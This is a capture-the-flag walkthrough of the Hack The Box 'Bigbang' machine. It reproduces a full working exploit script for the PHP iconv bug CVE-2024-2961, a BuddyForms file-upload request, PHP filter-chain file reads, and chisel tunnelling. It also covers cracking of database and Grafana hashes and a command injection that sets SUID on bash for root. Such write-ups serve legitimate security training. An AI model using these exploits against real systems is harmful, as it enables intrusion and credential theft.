Introduction to BigBang:
In this write-up, we will explore the “Bigbang” machine from Hack The Box, categorised as a Hard difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective on Bigbang
The goal of this walkthrough is to complete the “Bigbang” machine from Hack The Box by achieving the following objectives:
User Flag: The attacker exploits a WordPress plugin vulnerability (CVE-2023-26326) to upload files and leverages a file read vulnerability (CVE-2024-2961) to achieve remote code execution. They extract and crack the database credentials, revealing the password quantumphysics. Using these credentials, the attacker gains SSH access as the shawking user and retrieves the user flag by running cat /home/shawking/user.txt for submission.
Root Flag: A Grafana database yields the developer user’s credentials, and analysis of an APK file uncovers a vulnerable API endpoint at http://127.0.0.1:9090. Exploiting a command injection vulnerability to set SUID on bash grants root access, allowing retrieval of the root flag with cat /root/root.txt,
Enumerating the Bigbang Machine
Reconnaissance
Nmap Scan:
Start with a network scan to identify open ports and services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.66Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/bigbang]
└──╼ $nmap -sC -sV -oA initial 10.10.11.52
# Nmap 7.94SVN scan initiated Tue Jan 28 16:33:02 2025 as: nmap -sC -sV -oA initial 10.10.11.52
Nmap scan report for 10.10.11.52
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 d4:15:77:1e:82:2b:2f:f1:cc:96:c6:28:c1:86:6b:3f (ECDSA)
|_ 256 6c:42:60:7b:ba:ba:67:24:0f:0c:ac:5d:be:92:0c:66 (ED25519)
80/tcp open http Apache httpd 2.4.62
|_http-title: Did not follow redirect to http://blog.bigbang.htb/
|_http-server-header: Apache/2.4.62 (Debian)
Service Info: Host: blog.bigbang.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 28 16:34:13 2025 -- 1 IP address (1 host up) scanned in 71.40 secondsAnalysis:
- Port 22: OpenSSH service, which could potentially grant SSH access if credentials are compromised.
- Port 80: Apache web server hosting a WordPress blog, a common target for web-based attacks.
Web Enumeration on Bigbang:
It looks like a simple website
Gobuster enumeration on Bigbang
Enumerate the web server to uncover directories and files that may expose vulnerabilities.
gobuster dir -u http://blog.bigbang.htb -w /usr/share/wordlists/dirb/common.txtGobuster Output:
/wp-content (Status: 301)
/wp-admin (Status: 302) Analysis:
- /wp-content: The presence of the
/wp-contentdirectory confirms that the target is running a WordPress installation, as this is the default location for plugins, themes, and media. - /wp-admin: A 302 redirect from
/wp-adminindicates an active WordPress administrative login page, suggesting that the backend is accessible and potentially vulnerable to authentication-related attacks.
Upload Directory Analysis:
By default, these two files are included with WordPress.
The image, which is 1.8MB in size, appears unusual and cannot be opened or printed normally after downloading.
Let’s download a sample file to our local machine for analysis.
strings 1-1.pngTo continue the investigation, you can also extract any embedded text by using the strings command.
GNU C Library (GLIBC) metadata within an uploaded image file is highly unusual and may indicate a misconfiguration or a potential security flaw in the file upload process. In this case, the detected GLIBC version (2.36-9+deb12u4) matches the version installed on our system, as confirmed via gdb. This discovery warrants a thorough investigation into the upload mechanism and any related plugins to rule out abuse or unauthorised behaviour.
GDB verified this as the actual GLIBC version installed on the system.v
(gdb) !/lib/x86_64-linux-gnu/libc.so.6<br>GNU C Library (Debian GLIBC 2.36-9+deb12u4) stable release version 2.36.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.Compiled by GNU CC version 12.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
Minimum supported kernel: 3.2.0As a result, this alignment increases the likelihood of targeted exploitation, particularly if attackers exploit known vulnerabilities, such as CVE-2024-2961.
Exploitation of Bigbang Machine
Web Application Exploration
Looking back into the website interface itself, it looks like a WordPress CMS is been used
Another information that we found here is BuddyForms
What is BuddyForms?
BuddyForms is a powerful and user-friendly WordPress plugin for creating and managing a variety of forms. With its intuitive interface and flexible features, BuddyForms simplifies the process of gathering and managing user-generated content.
Exploiting the BuddyForms Plugin (CVE-2023-26326)
Recent research has identified a security vulnerability in the BuddyForms plugin for WordPress (affecting versions 2.8.2 and earlier). Documented under CVE-2023-26326, this vulnerability involves unauthenticated insecure deserialization, meaning attackers can exploit the system without needing to log in.
According to an analysis published by Tenable’s TechBlog, the issue stems from the upload_image_from_url AJAX action, where the plugin fails to properly sanitise the $_POST[‘url’] parameter.
Test File Upload:
curl -X POST http://blog.bigbang.htb/wp-admin/admin-ajax.php -d "action=upload_image_from_url&url=http://10.10.16.31/7x7.png&id=1&accepted_files=image/png"The upload_image_from_url action in BuddyForms allows unauthenticated file uploads, but the plugin enforces validation of image magic bytes (e.g., PNG headers) to ensure uploaded files are images, rejecting non-image files. The Tenable article notes that the vulnerability stems from the plugin’s failure to sanitise the $_POST[‘url’] parameter, allowing attackers to specify arbitrary URLS.
Exploiting LFI via CVE-2024-2961
By leveraging a controllable URL, we can upload an image and inspect its content post-upload. Based on observations from previously uploaded images, it’s necessary to prepend the file with the GIF89a signature to bypass format checks. This technique ultimately enables a Local File Inclusion (LFI) scenario using a PHP filter chain.
To assist with this, the tool ambionics/wrapwrap can be used.
Example usage for LFI with PHP filters:
python3 wrapwrap.py "/etc/passwd" "GIF89a" "" 1000This command creates a payload that includes /etc/passwd, prefixed with GIF89a, allowing for a successful LFI trigger via the php://filter wrapper
The output generated through the PHP filter wrapper has been successfully retrieved, as demonstrated above.
The filter payload was submitted using Burp Suite, and the server responded with a status of “OK“, indicating successful processing.
The contents /etc/passwd were successfully retrieved, as shown above.
Achieving Remote Code Execution
This information is potentially useful and can be leveraged by referencing prior research and routine investigative methods. For example, further details can be found in this analysis of CVE-2024-2961:
https://blog.lexfo.fr/iconv-cve-2024-2961-p1.html
To achieve remote code execution (RCE), the provided exploit code must be adapted to match the specific request format of the current target environment. Testing confirms that this approach is viable.
git clone https://github.com/ambionics/cnext-exploits exploitThis repository contains relevant exploitation tools and scripts for further testing.
Acquiring Target-Specific libc.so for Reliable Exploitation
#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE (CVE-2024-2961)
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#
from __future__ import annotations
import base64
from typing import Required
import zlib
from dataclasses import dataclass, field
from requests.exceptions import ConnectionError, ChunkedEncodingError
from pwn import *
from ten import *
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
class Remote:
"""A helper class to send the payload and download files.
The logic of the exploit is always the same, but the exploit needs to know how to
download files (/proc/self/maps and libc) and how to send the payload.
The code here serves as an example that attacks a page that looks like:
```php
<?php
$data = file_get_contents($_POST['file']);
echo "File contents: $data";
```
Tweak it to fit your target, and start the exploit.
"""
def __init__(self, url: str) -> None:
self.url = url
self.session = Session()
def send(self, path: str) -> Response:
"""Sends given `path` to the HTTP server. Returns the response.
"""
import urllib
return self.session.post(self.url, data={"action":"upload_image_from_url","url": urllib.parse.quote_plus(path),"id":1,"accepted_files":"image/gif"})
def clean_and_decode_base64(self,data):
import re
cleaned_data = re.sub(r'[^A-Za-z0-9+/=]', '', data)
missing_padding = len(cleaned_data) % 4
if missing_padding:
cleaned_data += '=' * (4 - missing_padding)
import base64
decoded_data = base64.b64decode(cleaned_data)
return decoded_data
def download(self, path: str) -> bytes:
"""Returns the contents of a remote file.
"""
path = f"php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://filter/convert.base64-encode/resource={path}"
response = self.send(path)
file_location = response.json()["response"]
print("[*] file location : " + file_location)
file_data = self.session.get(file_location).content[len('GIF89a\x1b$) '):]
file_dec = self.clean_and_decode_base64(file_data.decode("utf-8",errors='ignore'))
return file_dec
@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
"pad",
"Number of 0x100 chunks to pad with. If the website makes a lot of heap "
"operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
"""CNEXT exploit: RCE using a file read primitive in PHP."""
url: str
command: str
sleep: int = 1
heap: str = None
pad: int = 20
def __post_init__(self):
self.remote = Remote(self.url)
self.log = logger("EXPLOIT")
self.info = {}
self.heap = self.heap and int(self.heap, 16)
def check_vulnerable(self) -> None:
"""Checks whether the target is reachable and properly allows for the various
wrappers and filters that the exploit needs.
"""
def safe_download(path: str) -> bytes:
try:
return self.remote.download(path)
except ConnectionError:
failure("Target not [b]reachable[/] ?")
def check_token(text: str, path: str) -> bool:
result = safe_download(path)
return text.encode() == result
text = tf.random.string(50).encode()
base64 = b64(text, misalign=True).decode()
path = f"data:text/plain;base64,{base64}"
result = safe_download(path)
if text not in result:
msg_failure("Remote.download did not return the test string")
print("--------------------")
print(f"Expected test string: {text}")
print(f"Got: {result}")
print("--------------------")
failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")
msg_info("The [i]data://[/] wrapper works")
text = tf.random.string(50)
base64 = b64(text.encode(), misalign=True).decode()
path = f"php://filter//resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]php://filter/[/] wrapper does not work")
msg_info("The [i]php://filter/[/] wrapper works")
text = tf.random.string(50)
base64 = b64(compress(text.encode()), misalign=True).decode()
path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]zlib[/] extension is not enabled")
msg_info("The [i]zlib[/] extension is enabled")
msg_success("Exploit preconditions are satisfied")
def get_file(self, path: str) -> bytes:
with msg_status(f"Downloading [i]{path}[/]..."):
return self.remote.download(path)
def get_regions(self) -> list[Region]:
"""Obtains the memory regions of the PHP process by querying /proc/self/maps."""
maps = self.get_file("/proc/self/maps")
maps = maps.decode()
PATTERN = re.compile(
r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
)
regions = []
for region in table.split(maps, strip=True):
if match := PATTERN.match(region):
start = int(match.group(1), 16)
stop = int(match.group(2), 16)
permissions = match.group(3)
path = match.group(4)
if "/" in path or "[" in path:
path = path.rsplit(" ", 1)[-1]
else:
path = ""
current = Region(start, stop, permissions, path)
regions.append(current)
else:
print(maps)
failure("Unable to parse memory mappings")
self.log.info(f"Got {len(regions)} memory regions")
return regions
def get_symbols_and_addresses(self) -> None:
"""Obtains useful symbols and addresses from the file read primitive."""
regions = self.get_regions()
LIBC_FILE = "/dev/shm/cnext-libc"
# PHP's heap
self.info["heap"] = self.heap or self.find_main_heap(regions)
# Libc
libc = self._get_region(regions, "libc-", "libc.so")
#self.download_file(libc.path, LIBC_FILE)
LIBC_FILE = "./libc.so.6"
self.info["libc"] = ELF(LIBC_FILE, checksec=False)
self.info["libc"].address = libc.start
def _get_region(self, regions: list[Region], *names: str) -> Region:
"""Returns the first region whose name matches one of the given names."""
for region in regions:
if any(name in region.path for name in names):
break
else:
failure("Unable to locate region")
return region
def download_file(self, remote_path: str, local_path: str) -> None:
"""Downloads `remote_path` to `local_path`"""
data = self.get_file(remote_path)
Path(local_path).write(data)
def find_main_heap(self, regions: list[Region]) -> Region:
# Any anonymous RW region with a size superior to the base heap size is a
# candidate. The heap is at the bottom of the region.
heaps = [
region.stop - HEAP_SIZE + 0x40
for region in reversed(regions)
if region.permissions == "rw-p"
and region.size >= HEAP_SIZE
and region.stop & (HEAP_SIZE-1) == 0
and region.path in ("", "[anon:zend_alloc]")
]
if not heaps:
failure("Unable to find PHP's main heap in memory")
first = heaps[0]
if len(heaps) > 1:
heaps = ", ".join(map(hex, heaps))
msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
else:
msg_info(f"Using [i]{hex(first)}[/] as heap")
return first
def run(self) -> None:
#self.check_vulnerable()
self.get_symbols_and_addresses()
self.exploit()
def build_exploit_path(self) -> str:
"""On each step of the exploit, a filter will process each chunk one after the
other. Processing generally involves making some kind of operation either
on the chunk or in a destination chunk of the same size. Each operation is
applied on every single chunk; you cannot make PHP apply iconv on the first 10
chunks and leave the rest in place. That's where the difficulties come from.
Keep in mind that we know the address of the main heap, and the libraries.
ASLR/PIE do not matter here.
The idea is to use the bug to make the freelist for chunks of size 0x100 point
lower. For instance, we have the following free list:
... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00
By triggering the bug from chunk ..900, we get:
... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???
That's step 3.
Now, in order to control the free list, and make it point whereever we want,
we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
That's step 2.
Now, if we were to perform step2 an then step3 without anything else, we'd have
a problem: after step2 has been processed, the free list goes bottom-up, like:
0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900
We need to go the other way around. That's why we have step 1: it just allocates
chunks. When they get freed, they reverse the free list. Now step2 allocates in
reverse order, and therefore after step2, chunks are in the correct order.
Another problem comes up.
To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
Since step2 creates chunks that contain pointers and pointers are generally not
UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
To avoid this, we put the chunks in step2 at the very end of the chain, and
prefix them with `0\n`. When dechunked (right before the iconv), they will
"disappear" from the chain, preserving them from the character set conversion
and saving us from an unwanted processing error that would stop the processing
chain.
After step3 we have a corrupted freelist with an arbitrary pointer into it. We
don't know the precise layout of the heap, but we know that at the top of the
heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
Its free_slot[] array contains a pointer to each free list. By overwriting it,
we can make PHP allocate chunks whereever we want. In addition, its custom_heap
field contains pointers to hook functions for emalloc, efree, and erealloc
(similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
then overwrite the use_custom_heap flag to make PHP use these function pointers
instead. We can now do our favorite CTF technique and get a call to
system(<chunk>).
We make sure that the "system" command kills the current process to avoid other
system() calls with random chunk data, leading to undefined behaviour.
The pad blocks just "pad" our allocations so that even if the heap of the
process is in a random state, we still get contiguous, in order chunks for our
exploit.
Therefore, the whole process described here CANNOT crash. Everything falls
perfectly in place, and nothing can get in the middle of our allocations.
"""
LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
CS = 0x100
# Pad needs to stay at size 0x100 at every step
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)
step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)
# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"
step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)
step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)
step3_size = CS
step3 = b"\x00" * step3_size
assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)
step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)
step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)
# This chunk will eventually overwrite mm_heap->free_slot
# it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)
step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)
step4_use_custom_heap_size = 0x140
COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
if self.sleep:
COMMAND = f"sleep {self.sleep}; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"
assert (
len(COMMAND) <= step4_use_custom_heap_size
), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)
resource = compress(compress(pages))
resource = b64(resource)
resource = f"data:text/plain;base64,{resource.decode()}"
filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",
# Step 0: Setup heap
"dechunk",
"convert.iconv.L1.L1",
# Step 1: Reverse FL order
"dechunk",
"convert.iconv.L1.L1",
# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.L1.L1",
# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.L1.L1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"
return path
@inform("Triggering...")
def exploit(self) -> None:
path = self.build_exploit_path()
start = time.time()
try:
self.remote.send(path)
except (ConnectionError, ChunkedEncodingError):
pass
msg_print()
if not self.sleep:
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
elif start + self.sleep <= time.time():
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
else:
# Wrong heap, maybe? If the exploited suggested others, use them!
msg_print(" [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")
msg_print()
def compress(data) -> bytes:
"""Returns data suitable for `zlib.inflate`.
"""
# Remove 2-byte header and 4-byte checksum
return zlib.compress(data, 9)[2:-4]
def b64(data: bytes, misalign=True) -> bytes:
payload = base64.encode(data)
if not misalign and payload.endswith("="):
raise ValueError(f"Misaligned: {data}")
return payload.encode()
def compressed_bucket(data: bytes) -> bytes:
"""Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
return chunked_chunk(data, 0x8000)
def qpe(data: bytes) -> bytes:
"""Emulates quoted-printable-encode.
"""
return "".join(f"={x:02x}" for x in data).upper().encode()
def ptr_bucket(*ptrs, size=None) -> bytes:
"""Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)
return bucket
def chunked_chunk(data: bytes, size: int = None) -> bytes:
"""Constructs a chunked representation of the given chunk. If size is given, the
chunked representation has size `size`.
For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
"""
# The caller does not care about the size: let's just add 8, which is more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"
@dataclass
class Region:
"""A memory region."""
start: int
stop: int
permissions: str
path: str
@property
def size(self) -> int:
return self.stop - self.start
Exploit()Powerful PHP Vulnerability Exploit: From File Read to Full Remote Code Execution
This Python script exploits a critical PHP vulnerability (CVE-2024-2961) that lets attackers read sensitive files and execute arbitrary commands on a server remotely. By manipulating PHP’s memory management through a complex chain of data filters and payloads, it hijacks the server’s control flow, enabling full system takeover. Designed for authorised security testing, this powerful tool exposes how a subtle flaw can lead to devastating remote code execution.
Downloading the libc.so.6
After executing the script, it attempts to download libc.so. However, issues arise when handling large files, specifically, the downloaded libc.so file is incomplete due to download interruptions or size limitations.
Since the version of GLIBC (2.36-9+deb12u4) is present in the upload directory, you can search for the corresponding package of the same version. Once located, proceed to download it from the internet and replace the existing version.
CVE-20244-2961 exploitation
The command python3 test.py http://blog.bigbang.htb/wp-admin/admin-ajax.php 'whoami' is executed to interact with the website’s backend, targeting the admin-ajax.php file, commonly used in WordPress for AJAX requests in the admin interface. The whoami command is sent to retrieve information about the user account running the server-side processes.
In this case, the exploit was successful, meaning the script was able to execute remotely on the server and return the name of the user account, confirming that the vulnerability was successfully exploited. This result indicates that an attacker was able to gain unauthorised access and potentially escalate their privileges, opening the door for further exploitation.
It worked flawlessly.
Let’s execute another command to verify that it functions correctly.
It worked flawlessly once again.
Let’s obtain a shell by executing the command above.
Troubleshooting the connection issues
Unusually, the shell terminates immediately after execution.
The same issue occurs with the Netcat command.
I can’t believe I forgot to include 0>&1 in the command! That was a crucial part of the payload. There’s no way it’s not working. How could I have missed that?
Therefore, let’s add the missing part and try again.
Ultimately, the issue was resolved after I included the missing part, and it worked as expected.
Connecting to the WordPress Database and Extracting Hashes
Once I gain shell access, the first step is to locate the database credentials. Since WordPress relies on a backend database for management, the credentials can typically be found in the wp-config.php file located in the /var/www/html/wordpress directory.
After reviewing the file, I located the database credentials, including the username, password, and host:
With this information, I can now proceed to connect to the WordPress database and extract the necessary hashes.
When trying to access the database, I realised that Mysql isn’t installed on the victim’s machine. This means I can’t connect to the WordPress database directly as expected.
Now, I’ll need to consider other options, like extracting the database file or finding a way to install Mysql on the machine if possible.
Portfowarding with a chisel
The following commands can be used to forward the database port:
./chisel client IP:<PORT> R:3306:172.17.0.1:3306
./chisel server -p <PORT> --reverseThese commands establish a reverse proxy, allowing me to forward traffic from the victim machine to the database.
Let’s proceed with uploading Chisel on the victim’s machine.
The connection of port forwarding work
MySQL enumeration
After attempting the connection on our machine, we were unable to successfully connect to the server at 172.17.0.1.
The Mariadb service is not connected because it’s inactive, as shown by the inactive (dead) status. This typically means the service isn’t running, possibly due to not being started manually or enabled on boot. To fix this, start the service sudo systemctl start mariadb and verify it’s running with systemctl status mariadb. If issues persist, check logs for errors, ensure proper configuration, and confirm the Mysql port (3306) is open. A quick command can revive your database connection!
After troubleshooting, the connection was successfully established.
We successfully obtained the hashes for both the root and shawking accounts.
Finally, we cracked the hashes and retrieved the credentials
Log in to the system via SSH using the cracked credentials
We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access
Privilege Escalation
Gaining Access via Grafana
I found Grafana database is installed on the victim’s machine
The possible location of the Grafana database
Let’s download the database onto our machine
First, list the available tables
Then, query the user table to retrieve everything:
sqlite> SELECT * FROM user;
The formatting of the Grafana credentials includes both the password hashes and their corresponding salts.
Grafana2hashcat on bigbang machine
You can use the grafana2hashcat tool to convert Grafana password hashes into a format compatible with Hashcat for cracking.
We successfully obtained SHA-256 hashes using the grafana2hashcat tool.
Store the extracted hashes in a file named hashes.txt for further processing.
After running Hashcat for some time, we successfully recovered the password.
Access the developer portal using the credentials obtained earlier.
APK File
The developer account does not have access to any sudo binaries.
No relevant information was found using the ps aux command.
Located the satellite-app.apk file in the Android directory.
Download the APK file to our local machine.
Decompile using apktool
The file is located inside the satellite-app directory.
Jadx-GUI enumeration
I conducted a preliminary search to check for any network requests, and the results shown in the screenshot above
Verify the network connections and open ports using the netstat command.
Exploiting the API for Root Access
This curl command is used to authenticate a user by sending a POST request to the http://127.0.0.1:9090/login endpoint. It includes the user’s credentials, with the username set to “developer” and the password set to “bigbang” in JSON format.
The second curl command is aimed at executing a command on the system after authentication. It sends a POST request to the http://127.0.0.1:9090/command endpoint, which includes an authorisation token in the form of a Bearer JWT token to authenticate the user. The body of the request specifies a command (send_image) and includes another command to be executed on the server (chmod 4777 /bin/bash). This second command attempts to grant root privileges to the /bin/bash binary, potentially allowing unauthorised users to execute arbitrary commands with elevated privileges on the system. This action represents a potential security vulnerability that could be exploited to gain full access to the system.
We can read the root flag by typing the “cat root.txt” command